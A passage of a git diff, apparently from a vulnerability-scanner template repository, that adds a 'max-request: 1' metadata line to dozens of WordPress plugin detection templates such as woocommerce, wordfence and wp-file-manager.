b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ 